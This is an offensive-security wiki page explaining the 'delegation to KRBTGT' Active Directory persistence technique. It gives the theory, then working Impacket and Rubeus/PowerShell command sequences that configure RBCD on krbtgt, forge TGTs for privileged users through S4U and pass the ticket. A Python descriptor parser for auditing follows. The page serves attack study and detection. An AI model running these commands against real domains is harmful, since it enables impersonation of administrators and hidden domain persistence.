> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/ad/persistence/kerberos/delegation-to-krbtgt.md).

# Delegation to KRBTGT

## Theory

The idea behind this technique is to configure [resource-based constrained delegation](/ad/movement/kerberos/delegations/rbcd.md) (RBCD) on the `krbtgt` account so that TGTs can be generated on demand, as a persistence technique. The requirements are to have enough privileges (in practice, domain admin rights) to write the `krbtgt` account's RBCD attribute (`msDS-AllowedToActOnBehalfOfOtherIdentity`), and to control an account that has an SPN (or create one).

Once the delegation is configured, the attacker can later obtain, through S4U2self followed by S4U2proxy, a service ticket for the `krbtgt` service on behalf of almost any user. Since a TGT is nothing more than a service ticket for the `krbtgt` service, encrypted with the `krbtgt` key, the ticket obtained this way is accepted by the KDC as a TGT for that user. The only limitations are membership in the "Protected Users" group and the "Account is sensitive and cannot be delegated" setting (the `NOT_DELEGATED` flag in `userAccountControl`): the KDC refuses S4U2proxy for such accounts, so no ticket usable as a TGT can be obtained on their behalf through this delegation trick. Note that the attribute is an ordinary LDAP attribute on the `krbtgt` object: it is not touched by a `krbtgt` password reset and only disappears when explicitly cleared, which makes it worth auditing.

An example of the abuse goes as follows:

1. Configure RBCD on the `krbtgt` account so that a controlled account is allowed to delegate to it. This controlled account will be called "ControlledAccountWithSPN". It should have at least one SPN (`servicePrincipalName`) so that S4U2self returns a service ticket for it; strictly speaking an SPN is [not mandatory](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html), since S4U2self can target the account's own name and the unencrypted `sname` of the resulting ticket can be rewritten afterwards.
2. Perform a full [S4U](/ad/movement/kerberos/delegations.md) attack (S4U2self then S4U2proxy) as ControlledAccountWithSPN to obtain a service ticket for the `krbtgt` service on behalf of a privileged user, called "TargetedAccount" below. Because that ticket is for the `krbtgt` service, it can be used as a TGT for TargetedAccount.
3. Pass-the-ticket: use the obtained TGT to request service tickets as TargetedAccount and authenticate to remote resources as that privileged user.

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
Every step of this attack can be achieved with two scripts from Impacket: `rbcd.py` and `getST.py`.

{% code overflow="wrap" %}

```bash
# Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt
# (needs write access to krbtgt's msDS-AllowedToActOnBehalfOfOtherIdentity, e.g. a domain admin)
rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegedAccount':'StrongPassword'

# Step 2 : Full S4U (S4U2self + S4U2proxy) as ControlledAccountWithSPN, impersonating TargetedAccount toward krbtgt
# The resulting ticket is a TGT for TargetedAccount; getST.py saves it as '<impersonated>@<spn>@<domain>.ccache' and prints the name
getST.py -spn "KRBTGT" -impersonate "TargetedAccount" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'

# Step 3 : Pass-the-ticket: use that TGT to get a service ticket for TargetedAccount to the target service
KRB5CCNAME='TargetedAccount@KRBTGT@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass -dc-ip $dcIp 'DOMAIN'/'TargetedAccount'
```

{% endcode %}
{% endtab %}

{% tab title="Windows" %}
Every step of this attack can be achieved with Rubeus and the `Set-ADUser` cmdlet from the ActiveDirectory PowerShell module.

{% code overflow="wrap" %}

```powershell
# Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt (run as a domain admin)
# This overwrites any existing value of msDS-AllowedToActOnBehalfOfOtherIdentity on krbtgt
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN

# Step 2 : Full S4U (S4U2self + S4U2proxy) as ControlledAccountWithSPN, impersonating TargetedAccount toward krbtgt
# /nowrap prints the resulting ticket (a TGT for TargetedAccount) as a single base64 blob
Rubeus.exe s4u /nowrap /impersonateuser:"TargetedAccount" /msdsspn:"krbtgt" /domain:"DOMAIN" /user:"ControlledAccountWithSPN" /rc4:$NThash

# Step 3 : Use that TGT to request a service ticket for TargetedAccount to the target service,
# and inject it in memory (/ptt) to authenticate to remote resources
Rubeus.exe asktgs /service:"cifs/target" /ticket:"base64ticket...." /ptt
```

{% endcode %}

{% endtab %}
{% endtabs %}
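What step 1 actually writes, and what a defender should read back: `msDS-AllowedToActOnBehalfOfOtherIdentity` holds a binary NT security descriptor whose DACL lists the principals allowed to delegate to the account. The following Python is an added example, not code from this page nor from Impacket or Rubeus. It builds the descriptor in the same layout Impacket's `rbcd.py` writes (owner and group set to BUILTIN\Administrators, one ACCESS_ALLOWED_ACE with the full-control mask 0xF01FF per principal) and parses a descriptor back into SIDs, using only the standard library. The SID `S-1-5-21-1111-2222-3333-1105` is a constructed sample value; reading the real attribute from the `krbtgt` object over LDAP is left out.

```python
"""Build and parse msDS-AllowedToActOnBehalfOfOtherIdentity (a self-relative
NT security descriptor) with the standard library only. Added example."""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0xF01FF            # mask rbcd.py puts in each delegating principal's ACE
ADMINISTRATORS_SID = "S-1-5-32-544"
HEADER = "<BBHIIII"               # Revision, Sbz1, Control, OffOwner, OffGroup, OffSacl, OffDacl
ACL_HDR = "<BBHHH"                # AclRevision, Sbz1, AclSize, AceCount, Sbz2


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("bad SID: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off=0):
    """Return (SID string, encoded length) for the binary SID at buf[off]."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(principal_sids):
    """Descriptor granting every SID in principal_sids the right to delegate (rbcd.py layout)."""
    aces = b""
    for sid in principal_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 4 + 4 + len(sid_b)                      # ACE header + mask + SID
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0x00, ace_size)
        aces += struct.pack("<I", FULL_CONTROL) + sid_b
    acl = struct.pack(ACL_HDR, 4, 0, 8 + len(aces), len(principal_sids), 0) + aces
    owner = group = sid_to_bytes(ADMINISTRATORS_SID)
    off_owner = struct.calcsize(HEADER)                    # 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack(HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + group + acl


def allowed_to_act(descriptor):
    """Parse an attribute value; return [(sid, mask), ...] for each ACCESS_ALLOWED ACE.

    An empty/absent attribute, or one without a DACL, means nobody may delegate."""
    if not descriptor:
        return []
    revision, _sbz1, control, _own, _grp, _sacl, off_dacl = struct.unpack_from(HEADER, descriptor, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _rev, _sbz1, acl_size, ace_count, _sbz2 = struct.unpack_from(ACL_HDR, descriptor, off_dacl)
    pos, end = off_dacl + 8, off_dacl + acl_size
    principals = []
    for _ in range(ace_count):
        if pos + 4 > end:
            raise ValueError("truncated ACL")
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", descriptor, pos)
        if pos + ace_size > end:
            raise ValueError("ACE overruns ACL")
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", descriptor, pos + 4)[0]
            sid, _ = sid_from_bytes(descriptor, pos + 8)
            principals.append((sid, mask))
        pos += ace_size                                    # deny/object ACEs are skipped by size
    return principals


if __name__ == "__main__":
    # Constructed sample: the SID of a hypothetical ControlledAccountWithSPN
    sd = build_rbcd_descriptor(["S-1-5-21-1111-2222-3333-1105"])
    for sid, mask in allowed_to_act(sd):
        print("may delegate to this account: %s (mask 0x%X)" % (sid, mask))
```

Run `allowed_to_act` over the value read from `krbtgt`: any non-empty result is the list of accounts able to mint TGTs through this technique. Clearing the attribute (`rbcd.py -action remove` or `Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount $null`) removes the persistence.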

## Resources

{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence" %}

{% embed url="https://skyblue.team/posts/delegate-krbtgt/" %}

{% content-ref url="/pages/htnTxu7Lh2FZC87SiVFc" %}
[(RBCD) Resource-based constrained](/ad/movement/kerberos/delegations/rbcd.md)
{% endcontent-ref %}

